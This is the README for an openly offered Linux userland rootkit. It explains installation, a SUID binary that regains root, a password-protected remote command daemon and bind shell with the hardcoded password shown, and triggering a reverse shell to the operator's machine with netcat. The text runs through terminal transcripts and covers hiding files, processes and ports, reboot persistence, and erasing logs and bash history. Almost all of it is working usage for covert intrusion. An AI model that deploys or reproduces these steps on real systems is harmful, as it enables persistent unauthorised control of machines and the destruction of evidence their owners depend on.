BDS Linux Userland Rootkit

Developed by : Antonius
Website : www.bluedragonsec.com
Github : https://github.com/bluedragonsecurity
Twitter : https://twitter.com/bluedragonsec

Features :

• Hides files and directories
• Hides process
• Hides bind shell port, bds daemon port and reverse shell port from netstat
• Rootkit persistence to survive after reboot
• cleans logs and bash history during installation

Installation

You need root privilege for installing this rootkit.
In case you have installed gcc, install it by running the installer script:

./install.sh direct

In case you haven't installed gcc, install it by running the installer script :

./install.sh

Using the Rootkit

Privilege Escalation

Once the rootkit installed on the system, in case you lost root privilege, you can regain root privilege by typing :
/opt/bds_elf/bds_suid

robotsoft@robotsoft:~$ id
uid=1000(robotsoft) gid=1000(robotsoft) groups=1000(robotsoft),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),999(sambashare)
robotsoft@robotsoft:~$ /opt/bds_elf/bds_suid
root@robotsoft:~# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),999(sambashare),1000(robotsoft)
root@robotsoft:~# 

Using the Rootkit Daemon

Rootkit built in daemon is listening on port 31335, default password is : bluedragonsec. Using the rootkit built in daemon, you can issue a reverse shell connection and executing linux command on target machine (which you have installed rootkit) remotely. To connect to rootkit daemon, open your terminal and type :

  nc "target ip" 31335
  

Example :
You have installed bds userland on ip address 192.168.43.36 , open terminal and type:

robotsoft@robotsoft:~$ nc 192.168.43.36 31335
CMD :

Type any linux command in cmd prompt

robotsoft@robotsoft:~$ nc 192.168.43.36 31335
Password :bluedragonsec
CMD :id
uid=0(root) gid=0(root) groups=0(root)
CMD :uname -a
Linux robotsoft 5.11.0-49-generic #55-Ubuntu SMP Wed Jan 12 17:36:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
CMD :pwd
/
CMD :

Activating Reverse Shell

To activate reverse shell, you need to set up a port listener using netcat on port 31337, then connect to bds daemon on your target server (with rootkit installed) on port 31335.
On your machine, open terminal and type:

nc -l -p 31337 -v

Open another terminal tab and connect to target server on port 31335 :

nc server ip 31335
then type : 
/opt/bds_elf/bds_bc "your ip address"

Wait a few seconds and you will get reverse shell port connection from your target server.
Example :
Server ip address with rootkit installed is at 192.168.43.36, your local machine ip is at 192.168.43.230. Open terminal on your local machine and set up port listener on port 31337:

  robotsoft@robotsoft:~$ nc -l -p 31337 -v
  Listening on 0.0.0.0 31337

Open another terminal and connect to daemon on target machine (which you have installed rootkit) :

robotsoft@robotsoft:~$ nc 192.168.43.36 31335
CMD :/opt/bds_elf/bds_bc 192.168.43.230
CMD :

Back on your previous netcat listener, you will receive a reverse shell connection :

root@robotsoft:~# nc -l -p 31337 -v
Listening on 0.0.0.0 31337
Connection received on 192.168.43.36 42012
Linux robotsoft-virtualbox 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr  6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux robotsoft-virtualbox 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr  6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

Connecting to Bind Shell Port

Bind shell port on server (which you have installed rootkit) is at port 31337, the password is bluedragonsec. You can connect to bind shell port using netcat :

nc "server ip address" 31337
then type the password : bluedragonsec  

Example :
Server ip address (with bds userland rootkit installed) is at 192.168.43.36.

robotsoft@robotsoft:~$ nc 192.168.43.36 31337
Password :bluedragonsec
Linux robotsoft-virtualbox 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr  6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux robotsoft-virtualbox 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr  6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

Hiding Files and Directories

To hide file and directory just give prefix bds_ to file name and directory name

How to Clean Logs and Bash History ?
Before running installation script, add username to usernames_to_clear_logs.txt in new line, example:

root
robotsoft

User logs will be cleaned during rootkit installation

Process Hiding

This rootkit hides bind shell process, reverse shell process and rootkit built-in daemon process.

Port Hiding

This rootkit hides bind shell port, reverse shell port and rootkit built-in daemon port.

Persistence

The rootkit is activated every time the system starts up. After the reboot, wait for 2 minutes, the rootkit will be activated.